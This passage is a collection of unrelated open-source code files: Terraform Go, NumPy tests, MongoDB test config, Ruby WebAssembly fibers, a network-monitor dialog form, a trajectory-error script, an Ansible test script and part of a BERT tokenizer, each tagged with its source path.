		fmt.Fprint(stderr, err.Error())
		return 1
	}

	for {
		// cloudplugin streams output as multiple CommandResponse value. Each
		// value will either contain stdout bytes, stderr bytes, or an exit code.
		response, err := client.Recv()
		if err == io.EOF {
			log.Print("[DEBUG] received EOF from cloudplugin")
			break
		} else if err != nil {
			fmt.Fprintf(stderr, "Failed to receive command response from cloudplugin: %s", err)
			return 1
		}

		if bytes := response.GetStdout(); len(bytes) > 0 {
			written, err := fmt.Fprint(stdout, string(bytes))
			if err != nil {
				log.Printf("[ERROR] Failed to write cloudplugin output to stdout: %s", err)
				return 1
			}
			if written != len(bytes) {
				log.Printf("[ERROR] Wrote %d bytes to stdout but expected to write %d", written, len(bytes))
			}
		} else if bytes := response.GetStderr(); len(bytes) > 0 {
			written, err := fmt.Fprint(stderr, string(bytes))
			if err != nil {
				log.Printf("[ERROR] Failed to write cloudplugin output to stderr: %s", err)
				return 1
			}
			if written != len(bytes) {
				// BUG FIX: this branch writes to stderr; the original message
				// said "stdout" (copy/paste error from the branch above).
				log.Printf("[ERROR] Wrote %d bytes to stderr but expected to write %d", written, len(bytes))
			}
		} else {
			exitCode := response.GetExitCode()
			log.Printf("[TRACE] received exit code: %d", exitCode)
			if exitCode < 0 || exitCode > 255 {
				log.Printf("[ERROR] cloudplugin returned an invalid error code %d", exitCode)
				return 255
			}
			return int(exitCode)
		}
	}

	// This should indicate a bug in the plugin
	fmt.Fprint(stderr, "cloudplugin exited without responding with an error code")
	return 1
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/cloudplugin/cloudplugin1/grpc_client.go
|
"""
Test scalar buffer interface adheres to PEP 3118
"""
import pytest
import numpy as np
from numpy._core._multiarray_tests import get_buffer_info
from numpy._core._rational_tests import rational
from numpy.testing import assert_, assert_equal, assert_raises
# PEP3118 format strings for native (standard alignment and byteorder) types
scalars_and_codes = [
    (np.bool, '?'),
    (np.byte, 'b'),
    (np.short, 'h'),
    (np.intc, 'i'),
    (np.long, 'l'),
    (np.longlong, 'q'),
    (np.ubyte, 'B'),
    (np.ushort, 'H'),
    (np.uintc, 'I'),
    (np.ulong, 'L'),
    (np.ulonglong, 'Q'),
    (np.half, 'e'),
    (np.single, 'f'),
    (np.double, 'd'),
    (np.longdouble, 'g'),
    (np.csingle, 'Zf'),
    (np.cdouble, 'Zd'),
    (np.clongdouble, 'Zg'),
]
# Parallel tuples of just the scalar types and just the format codes; used
# below as pytest parametrize arguments and as human-readable test ids.
scalars_only, codes_only = zip(*scalars_and_codes)
class TestScalarPEP3118:
    """Verify that numpy scalars export PEP 3118 buffers that agree with the
    equivalent ndarray buffers, are 0-dimensional, and are always read-only."""

    @pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
    def test_scalar_match_array(self, scalar):
        # A scalar's buffer format string must equal that of an (empty)
        # ndarray of the same dtype.
        x = scalar()
        a = np.array([], dtype=np.dtype(scalar))
        mv_x = memoryview(x)
        mv_a = memoryview(a)
        assert_equal(mv_x.format, mv_a.format)

    @pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
    def test_scalar_dim(self, scalar):
        # Scalars behave like 0-d buffers: empty shape/strides/suboffsets.
        x = scalar()
        mv_x = memoryview(x)
        assert_equal(mv_x.itemsize, np.dtype(scalar).itemsize)
        assert_equal(mv_x.ndim, 0)
        assert_equal(mv_x.shape, ())
        assert_equal(mv_x.strides, ())
        assert_equal(mv_x.suboffsets, ())

    @pytest.mark.parametrize('scalar, code', scalars_and_codes, ids=codes_only)
    def test_scalar_code_and_properties(self, scalar, code):
        # Full property snapshot against the expected PEP 3118 format code.
        x = scalar()
        expected = {'strides': (), 'itemsize': x.dtype.itemsize, 'ndim': 0,
                    'shape': (), 'format': code, 'readonly': True}
        mv_x = memoryview(x)
        assert self._as_dict(mv_x) == expected

    @pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
    def test_scalar_buffers_readonly(self, scalar):
        # Requesting a WRITABLE buffer from any scalar must raise.
        x = scalar()
        with pytest.raises(BufferError, match="scalar buffer is readonly"):
            get_buffer_info(x, ["WRITABLE"])

    def test_void_scalar_structured_data(self):
        # A structured void scalar must expose a buffer whose itemsize and
        # format agree with an ndarray of the same structured dtype.
        dt = np.dtype([('name', np.str_, 16), ('grades', np.float64, (2,))])
        x = np.array(('ndarray_scalar', (1.2, 3.0)), dtype=dt)[()]
        assert_(isinstance(x, np.void))
        mv_x = memoryview(x)
        expected_size = 16 * np.dtype((np.str_, 1)).itemsize
        expected_size += 2 * np.dtype(np.float64).itemsize
        assert_equal(mv_x.itemsize, expected_size)
        assert_equal(mv_x.ndim, 0)
        assert_equal(mv_x.shape, ())
        assert_equal(mv_x.strides, ())
        assert_equal(mv_x.suboffsets, ())

        # check scalar format string against ndarray format string
        a = np.array([('Sarah', (8.0, 7.0)), ('John', (6.0, 7.0))], dtype=dt)
        assert_(isinstance(a, np.ndarray))
        mv_a = memoryview(a)
        assert_equal(mv_x.itemsize, mv_a.itemsize)
        assert_equal(mv_x.format, mv_a.format)

        # Check that we do not allow writeable buffer export (technically
        # we could allow it sometimes here...)
        with pytest.raises(BufferError, match="scalar buffer is readonly"):
            get_buffer_info(x, ["WRITABLE"])

    def _as_dict(self, m):
        # Helper: snapshot the interesting memoryview properties as a dict.
        return {'strides': m.strides, 'shape': m.shape, 'itemsize': m.itemsize,
                'ndim': m.ndim, 'format': m.format, 'readonly': m.readonly}

    def test_datetime_memoryview(self):
        # gh-11656
        # Values verified with v1.13.3, shape is not () as in test_scalar_dim
        dt1 = np.datetime64('2016-01-01')
        dt2 = np.datetime64('2017-01-01')
        expected = {'strides': (1,), 'itemsize': 1, 'ndim': 1, 'shape': (8,),
                    'format': 'B', 'readonly': True}

        v = memoryview(dt1)
        assert self._as_dict(v) == expected

        v = memoryview(dt2 - dt1)
        assert self._as_dict(v) == expected

        dt = np.dtype([('a', 'uint16'), ('b', 'M8[s]')])
        a = np.empty(1, dt)
        # Fails to create a PEP 3118 valid buffer
        assert_raises((ValueError, BufferError), memoryview, a[0])

        # Check that we do not allow writeable buffer export
        with pytest.raises(BufferError, match="scalar buffer is readonly"):
            get_buffer_info(dt1, ["WRITABLE"])

    @pytest.mark.parametrize('s', [
        pytest.param("\x32\x32", id="ascii"),
        pytest.param("\uFE0F\uFE0F", id="basic multilingual"),
        pytest.param("\U0001f4bb\U0001f4bb", id="non-BMP"),
    ])
    def test_str_ucs4(self, s):
        s = np.str_(s)  # only our subclass implements the buffer protocol

        # all the same, characters always encode as ucs4
        expected = {'strides': (), 'itemsize': 8, 'ndim': 0, 'shape': (),
                    'format': '2w', 'readonly': True}

        v = memoryview(s)
        assert self._as_dict(v) == expected

        # integers of the platform-appropriate endianness
        code_points = np.frombuffer(v, dtype='i4')
        assert_equal(code_points, [ord(c) for c in s])

        # Check that we do not allow writeable buffer export
        with pytest.raises(BufferError, match="scalar buffer is readonly"):
            get_buffer_info(s, ["WRITABLE"])

    def test_user_scalar_fails_buffer(self):
        # User-defined scalar types (rational) implement no buffer protocol.
        r = rational(1)
        with assert_raises(TypeError):
            memoryview(r)

        # Check that we do not allow writeable buffer export
        with pytest.raises(BufferError, match="scalar buffer is readonly"):
            get_buffer_info(r, ["WRITABLE"])
|
python
|
github
|
https://github.com/numpy/numpy
|
numpy/_core/tests/test_scalarbuffer.py
|
##########################################################
# THIS IS A GENERATED FILE -- DO NOT MODIFY.
# IF YOU WISH TO MODIFY THIS SUITE, MODIFY THE CORRESPONDING MATRIX SUITE MAPPING FILE
# AND REGENERATE THE MATRIX SUITES.
#
# matrix suite mapping file: buildscripts/resmokeconfig/matrix_suites/mappings/replica_sets_jscore_passthrough_execution_control_with_prioritization.yml
# regenerate matrix suites: buildscripts/resmoke.py generate-matrix-suites
##########################################################
executor:
archive:
hooks:
- RunDBCheckInBackground
- CheckReplDBHashInBackground
- ValidateCollectionsInBackground
- CheckReplDBHash
- CheckReplOplogs
- ValidateCollections
config:
shell_options:
eval: globalThis.testingReplication = true;
fixture:
class: ReplicaSetFixture
mongod_options:
set_parameters:
enableTestCommands: 1
executionControlDeprioritizationGate: true
num_nodes: 2
hooks:
- class: RunDBCheckInBackground
- class: CheckReplDBHashInBackground
- class: ValidateCollectionsInBackground
- class: CheckReplOplogs
- class: CheckReplDBHash
- class: ValidateCollections
- class: CleanEveryN
n: 20
matrix_suite: true
selector:
exclude_files:
- jstests/core/txns/abort_expired_transaction.js
- jstests/core/txns/abort_transaction_thread_does_not_block_on_locks.js
- jstests/core/txns/kill_op_on_txn_expiry.js
- jstests/core/**/set_param1.js
- jstests/core/query/awaitdata_getmore_cmd.js
- jstests/core/administrative/current_op/currentop.js
- jstests/core/administrative/fsync/fsync.js
- jstests/core/txns/prepare_conflict.js
- jstests/core/txns/prepare_conflict_aggregation_behavior.js
- jstests/core/timeseries/write/timeseries_update_multi.js
exclude_with_any_tags:
- assumes_standalone_mongod
- requires_profiling
roots:
- jstests/core/**/*.js
- jstests/fle2/**/*.js
- src/mongo/db/modules/*/jstests/fle2/**/*.js
test_kind: js_test
|
unknown
|
github
|
https://github.com/mongodb/mongo
|
buildscripts/resmokeconfig/matrix_suites/generated_suites/replica_sets_jscore_passthrough_execution_control_with_prioritization.yml
|
/*
This is a ucontext-like userland context switching API for WebAssembly based on Binaryen's Asyncify.
* NOTE:
* This mechanism doesn't take care of stack state. Just save and restore program counter and
* registers (rephrased as locals by Wasm term). So use-site need to save and restore the C stack pointer.
* This Asyncify based implementation is not much efficient and will be replaced with future stack-switching feature.
*/
#include <stdlib.h>
#include "wasm/fiber.h"
#include "wasm/asyncify.h"
#ifdef RB_WASM_ENABLE_DEBUG_LOG
# include <stdio.h>
# define RB_WASM_DEBUG_LOG(...) fprintf(stderr, __VA_ARGS__)
#else
# define RB_WASM_DEBUG_LOG(...)
#endif
/*
 * Initialize a fiber context so a later swap can start *func*(arg0, arg1).
 * The Asyncify unwind buffer is pointed at the fiber's embedded stack
 * storage; the fiber is marked not-started and not-rewinding.
 */
void
rb_wasm_init_context(rb_wasm_fiber_context *fcp, void (*func)(void *, void *), void *arg0, void *arg1)
{
    /* Asyncify writes the unwound locals between top and end. */
    fcp->asyncify_buf.top = &fcp->asyncify_buf.buffer[0];
    fcp->asyncify_buf.end = &fcp->asyncify_buf.buffer[WASM_FIBER_STACK_BUFFER_SIZE];
    fcp->is_rewinding = false;
    fcp->is_started = false;   /* entry_point has not run yet */
    fcp->entry_point = func;
    fcp->arg0 = arg0;
    fcp->arg1 = arg1;
    RB_WASM_DEBUG_LOG("[%s] fcp->asyncify_buf %p\n", __func__, &fcp->asyncify_buf);
}
/* The fiber the next unwind should switch to; set here and consumed by
 * rb_wasm_handle_fiber_unwind() once the unwind reaches the main loop. */
static rb_wasm_fiber_context *_rb_wasm_active_next_fiber;

/*
 * Switch from fiber *ofcp* to fiber *fcp*.  The first call starts an
 * Asyncify unwind; control re-enters this function a second time when
 * *ofcp* is later rewound, at which point the rewind is finished and the
 * function returns normally to the resumed fiber.
 */
void
rb_wasm_swapcontext(rb_wasm_fiber_context *ofcp, rb_wasm_fiber_context *fcp)
{
    RB_WASM_DEBUG_LOG("[%s] enter ofcp = %p fcp = %p\n", __func__, ofcp, fcp);
    if (ofcp->is_rewinding) {
        /* Second entry: we were just rewound back into this fiber.
         * Stop the rewind and resume normal execution. */
        asyncify_stop_rewind();
        ofcp->is_rewinding = false;
        return;
    }
    /* First entry: record the target and unwind out of this fiber. */
    _rb_wasm_active_next_fiber = fcp;
    RB_WASM_DEBUG_LOG("[%s] start unwinding asyncify_buf = %p\n", __func__, &ofcp->asyncify_buf);
    asyncify_start_unwind(&ofcp->asyncify_buf);
}
/*
 * Called after an Asyncify unwind completes to decide what to run next.
 *
 * Outputs: the pending fiber's entry point and its two arguments, plus
 * *is_new_fiber_started* telling the caller whether to invoke the entry
 * point fresh (return NULL) or to rewind into the fiber (return its
 * asyncify buffer).  Returns NULL as well when no fiber switch is pending
 * (the unwind came from something other than rb_wasm_swapcontext).
 */
void *
rb_wasm_handle_fiber_unwind(void (**new_fiber_entry)(void *, void *),
                            void **arg0, void **arg1, bool *is_new_fiber_started)
{
    rb_wasm_fiber_context *next_fiber;
    if (!_rb_wasm_active_next_fiber) {
        /* The unwind was not requested by a fiber switch. */
        RB_WASM_DEBUG_LOG("[%s] no next fiber\n", __func__);
        *is_new_fiber_started = false;
        return NULL;
    }
    /* Consume the pending switch request exactly once. */
    next_fiber = _rb_wasm_active_next_fiber;
    _rb_wasm_active_next_fiber = NULL;
    RB_WASM_DEBUG_LOG("[%s] next_fiber->asyncify_buf = %p\n", __func__, &next_fiber->asyncify_buf);
    *new_fiber_entry = next_fiber->entry_point;
    *arg0 = next_fiber->arg0;
    *arg1 = next_fiber->arg1;
    if (!next_fiber->is_started) {
        RB_WASM_DEBUG_LOG("[%s] new fiber started\n", __func__);
        // start a new fiber if not started yet.
        next_fiber->is_started = true;
        *is_new_fiber_started = true;
        return NULL;
    } else {
        RB_WASM_DEBUG_LOG("[%s] resume a fiber\n", __func__);
        // resume a fiber again
        next_fiber->is_rewinding = true;
        *is_new_fiber_started = false;
        return &next_fiber->asyncify_buf;
    }
}
|
c
|
github
|
https://github.com/ruby/ruby
|
wasm/fiber.c
|
from tools import widget_form, widget_menu
class SiteForm:
    """Dialog-driven form for creating or editing a site entry."""

    def __init__(self, sitename, timingtemplate, description):
        module_name = self.__class__.__name__
        self.menulist = []
        self.menudata = {
            '_text': '',
            '_backtitle': 'Developed by Bernhard - Module: ' + module_name,
            '_title': 'Lidskjalv - Network Monitor'
        }
        self.sitename = sitename
        self.timingtemplate = timingtemplate
        self.description = description

    def form_standard(self):
        """Show the three-field 'Add a new site' form and print the result."""
        title = "Add a new site"
        value_col = 43
        label_width = 18
        fields = (
            ("Site name:".ljust(label_width), 1, 1, '', 1, value_col, 31, 31),
            ("Timing template:".ljust(label_width), 3, 1, '', 3, value_col, 31, 31),
            ("Description:".ljust(label_width), 5, 1, '', 5, value_col, 31, 31),
        )
        print(widget_form(title, fields))

    def timing_template_form(self, tt):
        """Show the nmap timing-template menu and return the chosen level."""
        module_name = self.__class__.__name__
        menudata = {
            '_text': '0 - 1: Very hard to detect.\n4 - 5: Detectable scan',
            '_backtitle': 'Developed by Bernhard - Module: ' + module_name,
            '_title': 'Lidskjalv - Timing Template'
        }
        menulist = [
            ["0", "Paranoid"],
            ["1", "Sneaky"],
            ["2", "Polite"],
            ["3", "Normal"],
            ["4", "Aggressive"],
            ["5", "Insane"],
        ]
        code, tag = widget_menu(menulist, menudata)
        choice = int(tag)
        print(choice)
        return choice

    def main(self):
        """Run the edit loop until the user picks Done or Cancel."""
        while True:
            self.buildmenu()
            code, tag = widget_menu(self.menulist, self.menudata)
            if code != "ok":
                continue
            if tag == "Site name":
                self.sitename = self.inputbox(
                    "Add a name for the site:",
                    "Site name:",
                    self.sitename)
            elif tag == "Timing template":
                self.timingtemplate = self.timing_template_form(
                    self.timingtemplate)
            elif tag == "Description":
                self.description = self.inputbox(
                    "Add a description for the site:",
                    "Description:",
                    self.description)
            elif tag == "Cancel":
                return None
            elif tag == "Done":
                return [
                    self.sitename,
                    self.timingtemplate,
                    self.description]

    def inputbox(self, t, label, value):
        """Show a one-field input dialog and return (and print) the value."""
        offset = len(label) + 4
        fields = ((label, 1, 1, value, 1, offset, 50, 50),)
        result = widget_form(t, fields)
        print(result[1][0])
        return result[1][0]

    def buildmenu(self):
        """Rebuild the main menu entries from the current field values."""
        self.menulist = [
            ["Site name", self.sitename],
            ["Timing template", str(self.timingtemplate)],
            ["Description", self.description],
            ["", ""],
            ["Done", ""],
            ["Cancel", ""],
        ]
# This file is a library module; running it directly only prints a hint.
if __name__ == '__main__':
    print("This is a module.",
          "Please run the lidskjalvmanager in the future.")
    # Example usage kept for reference:
    # o = SiteForm("", "4", "")
    # print(o.main())
    # o.timing_template(2)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Juergen Sturm, TUM
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of TUM nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Requirements:
# sudo apt-get install python-argparse
"""
This script computes the absolute trajectory error from the ground truth
trajectory and the estimated trajectory.
"""
import sys
import numpy
import argparse
import associate
def align(model, data):
    """Align two trajectories using the method of Horn (closed-form).

    Input:
    model -- first trajectory (3xn numpy matrix)
    data -- second trajectory (3xn numpy matrix)

    Output:
    rot -- rotation matrix (3x3)
    trans -- translation vector (3x1)
    trans_error -- translational error per point (1xn)
    """
    numpy.set_printoptions(precision=3, suppress=True)
    # Center both point sets on their centroids.
    model_zerocentered = model - model.mean(1)
    data_zerocentered = data - data.mean(1)

    # Cross-covariance matrix between the two centered point sets.
    W = numpy.zeros((3, 3))
    for column in range(model.shape[1]):
        W += numpy.outer(model_zerocentered[:, column], data_zerocentered[:, column])
    # BUG FIX: use the public numpy.linalg.svd instead of the private
    # numpy.linalg.linalg.svd path, which is removed in modern NumPy.
    U, d, Vh = numpy.linalg.svd(W.transpose())
    S = numpy.matrix(numpy.identity(3))
    # Ensure a proper rotation (det == +1), not a reflection.
    if (numpy.linalg.det(U) * numpy.linalg.det(Vh) < 0):
        S[2, 2] = -1
    rot = U * S * Vh
    trans = data.mean(1) - rot * model.mean(1)

    model_aligned = rot * model + trans
    alignment_error = model_aligned - data
    trans_error = numpy.sqrt(numpy.sum(numpy.multiply(alignment_error, alignment_error), 0)).A[0]

    return rot, trans, trans_error
def plot_traj(ax, stamps, traj, style, color, label):
    """
    Plot a trajectory using matplotlib, broken into segments wherever two
    consecutive stamps are more than twice the median time step apart.

    Input:
    ax -- the plot
    stamps -- time stamps (1xn); note: sorted in place
    traj -- trajectory (3xn)
    style -- line style
    color -- line color
    label -- plot legend (attached to the first plotted segment only)
    """
    stamps.sort()
    interval = numpy.median([s - t for s, t in zip(stamps[1:], stamps[:-1])])
    xs = []
    ys = []
    last = stamps[0]
    for i in range(len(stamps)):
        if stamps[i] - last < 2 * interval:
            xs.append(traj[i][0])
            ys.append(traj[i][1])
        elif xs:
            # Gap detected: flush the accumulated segment and start over
            # (the point at the gap itself is intentionally skipped).
            ax.plot(xs, ys, style, color=color, label=label)
            label = ""
            xs = []
            ys = []
        last = stamps[i]
    if xs:
        ax.plot(xs, ys, style, color=color, label=label)
# Command-line entry point: associate, align and compare two trajectories,
# then optionally save or plot the results.  (Python 2 script.)
if __name__ == "__main__":
    # parse command line
    parser = argparse.ArgumentParser(description='''
This script computes the absolute trajectory error from the ground truth trajectory and the estimated trajectory.
''')
    parser.add_argument('first_file', help='ground truth trajectory (format: timestamp tx ty tz qx qy qz qw)')
    parser.add_argument('second_file', help='estimated trajectory (format: timestamp tx ty tz qx qy qz qw)')
    parser.add_argument('--offset', help='time offset added to the timestamps of the second file (default: 0.0)', default=0.0)
    parser.add_argument('--scale', help='scaling factor for the second trajectory (default: 1.0)', default=1.0)
    parser.add_argument('--max_difference', help='maximally allowed time difference for matching entries (default: 0.02)', default=0.02)
    parser.add_argument('--save', help='save aligned second trajectory to disk (format: stamp2 x2 y2 z2)')
    parser.add_argument('--save_associations', help='save associated first and aligned second trajectory to disk (format: stamp1 x1 y1 z1 stamp2 x2 y2 z2)')
    parser.add_argument('--plot', help='plot the first and the aligned second trajectory to an image (format: png)')
    parser.add_argument('--verbose', help='print all evaluation data (otherwise, only the RMSE absolute translational error in meters after alignment will be printed)', action='store_true')
    args = parser.parse_args()

    # Read both trajectories and pair entries whose timestamps match within
    # --max_difference (after shifting the second file by --offset).
    first_list = associate.read_file_list(args.first_file)
    second_list = associate.read_file_list(args.second_file)

    matches = associate.associate(first_list, second_list, float(args.offset), float(args.max_difference))
    if len(matches) < 2:
        sys.exit("Couldn't find matching timestamp pairs between groundtruth and estimated trajectory! Did you choose the correct sequence?")

    # Matched xyz positions as 3xn matrices (second trajectory scaled).
    first_xyz = numpy.matrix([[float(value) for value in first_list[a][0:3]] for a, b in matches]).transpose()
    second_xyz = numpy.matrix([[float(value) * float(args.scale) for value in second_list[b][0:3]] for a, b in matches]).transpose()
    # Horn alignment of the estimated trajectory onto the ground truth.
    rot, trans, trans_error = align(second_xyz, first_xyz)

    second_xyz_aligned = rot * second_xyz + trans

    # Full (unmatched) trajectories, for saving/plotting.
    first_stamps = first_list.keys()
    first_stamps.sort()
    first_xyz_full = numpy.matrix([[float(value) for value in first_list[b][0:3]] for b in first_stamps]).transpose()

    second_stamps = second_list.keys()
    second_stamps.sort()
    second_xyz_full = numpy.matrix([[float(value) * float(args.scale) for value in second_list[b][0:3]] for b in second_stamps]).transpose()
    second_xyz_full_aligned = rot * second_xyz_full + trans

    if args.verbose:
        print "compared_pose_pairs %d pairs"%(len(trans_error))
        print "absolute_translational_error.rmse %f m"%numpy.sqrt(numpy.dot(trans_error,trans_error) / len(trans_error))
        print "absolute_translational_error.mean %f m"%numpy.mean(trans_error)
        print "absolute_translational_error.median %f m"%numpy.median(trans_error)
        print "absolute_translational_error.std %f m"%numpy.std(trans_error)
        print "absolute_translational_error.min %f m"%numpy.min(trans_error)
        print "absolute_translational_error.max %f m"%numpy.max(trans_error)
    else:
        # Default output: the RMSE translational error only.
        print "%f"%numpy.sqrt(numpy.dot(trans_error,trans_error) / len(trans_error))

    if args.save_associations:
        file = open(args.save_associations, "w")
        file.write("\n".join(["%f %f %f %f %f %f %f %f"%(a,x1,y1,z1,b,x2,y2,z2) for (a,b),(x1,y1,z1),(x2,y2,z2) in zip(matches,first_xyz.transpose().A,second_xyz_aligned.transpose().A)]))
        file.close()

    if args.save:
        file = open(args.save, "w")
        file.write("\n".join(["%f "%stamp+" ".join(["%f"%d for d in line]) for stamp,line in zip(second_stamps,second_xyz_full_aligned.transpose().A)]))
        file.close()

    if args.plot:
        # Matplotlib imported lazily and with the Agg backend so the script
        # works on headless machines when plotting is requested.
        import matplotlib
        matplotlib.use('Agg')
        import matplotlib.pyplot as plt
        import matplotlib.pylab as pylab
        from matplotlib.patches import Ellipse
        fig = plt.figure()
        ax = fig.add_subplot(111)
        plot_traj(ax, first_stamps, first_xyz_full.transpose().A, '-', "black", "ground truth")
        plot_traj(ax, second_stamps, second_xyz_full_aligned.transpose().A, '-', "blue", "estimated")

        # Red lines connect each matched ground-truth/estimated point pair.
        label = "difference"
        for (a,b),(x1,y1,z1),(x2,y2,z2) in zip(matches,first_xyz.transpose().A,second_xyz_aligned.transpose().A):
            ax.plot([x1,x2],[y1,y2],'-',color="red",label=label)
            label = ""

        ax.legend()
        ax.set_xlabel('x [m]')
        ax.set_ylabel('y [m]')
        plt.savefig(args.plot, dpi=90)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env bash
# Integration-test driver for Ansible binary modules.
set -eux

# INVENTORY must point at an existing inventory file.
[ -f "${INVENTORY}" ]

# Download the prebuilt binary test modules, then run the test playbook
# against the same inventory.  Host key checking is disabled because the
# test hosts are throwaway instances.
ANSIBLE_HOST_KEY_CHECKING=false ansible-playbook download_binary_modules.yml -i "${INVENTORY}" -v "$@"
ANSIBLE_HOST_KEY_CHECKING=false ansible-playbook test_binary_modules.yml -i "${INVENTORY}" -v "$@"
|
unknown
|
github
|
https://github.com/ansible/ansible
|
test/integration/targets/binary_modules/test.sh
|
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for Bert."""
import collections
import os
import unicodedata
from ...tokenization_python import PreTrainedTokenizer, _is_control, _is_punctuation, _is_whitespace
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt"}
def load_vocab(vocab_file):
    """Read a vocabulary file and map each token to its line index."""
    vocab = collections.OrderedDict()
    with open(vocab_file, "r", encoding="utf-8") as reader:
        # One token per line; the line number (0-based) is the token id.
        for index, line in enumerate(reader):
            vocab[line.rstrip("\n")] = index
    return vocab
def whitespace_tokenize(text):
    """Trim surrounding whitespace and split `text` into whitespace-separated tokens."""
    stripped = text.strip()
    # An all-whitespace (or empty) input produces no tokens.
    return stripped.split() if stripped else []
class BertTokenizerLegacy(PreTrainedTokenizer):
    r"""
    Construct a BERT tokenizer. Based on WordPiece.
    This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
    this superclass for more information regarding those methods.
    Args:
        vocab_file (`str`):
            File containing the vocabulary.
        do_lower_case (`bool`, *optional*, defaults to `True`):
            Whether or not to lowercase the input when tokenizing.
        do_basic_tokenize (`bool`, *optional*, defaults to `True`):
            Whether or not to do basic tokenization before WordPiece.
        never_split (`Iterable`, *optional*):
            Collection of tokens which will never be split during tokenization. Only has an effect when
            `do_basic_tokenize=True`
        unk_token (`str`, *optional*, defaults to `"[UNK]"`):
            The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
            token instead.
        sep_token (`str`, *optional*, defaults to `"[SEP]"`):
            The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
            sequence classification or for a text and a question for question answering. It is also used as the last
            token of a sequence built with special tokens.
        pad_token (`str`, *optional*, defaults to `"[PAD]"`):
            The token used for padding, for example when batching sequences of different lengths.
        cls_token (`str`, *optional*, defaults to `"[CLS]"`):
            The classifier token which is used when doing sequence classification (classification of the whole sequence
            instead of per-token classification). It is the first token of the sequence when built with special tokens.
        mask_token (`str`, *optional*, defaults to `"[MASK]"`):
            The token used for masking values. This is the token used when training this model with masked language
            modeling. This is the token which the model will try to predict.
        tokenize_chinese_chars (`bool`, *optional*, defaults to `True`):
            Whether or not to tokenize Chinese characters.
            This should likely be deactivated for Japanese (see this
            [issue](https://github.com/huggingface/transformers/issues/328)).
        strip_accents (`bool`, *optional*):
            Whether or not to strip all accents. If this option is not specified, then it will be determined by the
            value for `lowercase` (as in the original BERT).
        clean_up_tokenization_spaces (`bool`, *optional*, defaults to `True`):
            Whether or not to cleanup spaces after decoding, cleanup consists in removing potential artifacts like
            extra spaces.
    """

    vocab_files_names = VOCAB_FILES_NAMES

    def __init__(
        self,
        vocab_file,
        do_lower_case=True,
        do_basic_tokenize=True,
        never_split=None,
        unk_token="[UNK]",
        sep_token="[SEP]",
        pad_token="[PAD]",
        cls_token="[CLS]",
        mask_token="[MASK]",
        tokenize_chinese_chars=True,
        strip_accents=None,
        clean_up_tokenization_spaces=True,
        **kwargs,
    ):
        if not os.path.isfile(vocab_file):
            raise ValueError(
                f"Can't find a vocabulary file at path '{vocab_file}'. To load the vocabulary from a Google pretrained"
                " model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`"
            )
        # token -> id mapping, in vocabulary-file order.
        self.vocab = load_vocab(vocab_file)
        # id -> token reverse mapping, used by _convert_id_to_token.
        self.ids_to_tokens = collections.OrderedDict([(ids, tok) for tok, ids in self.vocab.items()])
        self.do_basic_tokenize = do_basic_tokenize
        # NOTE(review): when do_basic_tokenize is False, self.basic_tokenizer is
        # never created, so the do_lower_case property below would raise
        # AttributeError in that configuration.
        if do_basic_tokenize:
            self.basic_tokenizer = BasicTokenizer(
                do_lower_case=do_lower_case,
                never_split=never_split,
                tokenize_chinese_chars=tokenize_chinese_chars,
                strip_accents=strip_accents,
            )
        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=str(unk_token))
        # Tokenizer state is set up before calling the base constructor, which
        # presumably may invoke _tokenize while registering special tokens.
        super().__init__(
            do_lower_case=do_lower_case,
            do_basic_tokenize=do_basic_tokenize,
            never_split=never_split,
            unk_token=unk_token,
            sep_token=sep_token,
            pad_token=pad_token,
            cls_token=cls_token,
            mask_token=mask_token,
            tokenize_chinese_chars=tokenize_chinese_chars,
            strip_accents=strip_accents,
            clean_up_tokenization_spaces=clean_up_tokenization_spaces,
            **kwargs,
        )

    @property
    def do_lower_case(self):
        # Mirrors the basic tokenizer's setting (see NOTE in __init__).
        return self.basic_tokenizer.do_lower_case

    @property
    def vocab_size(self):
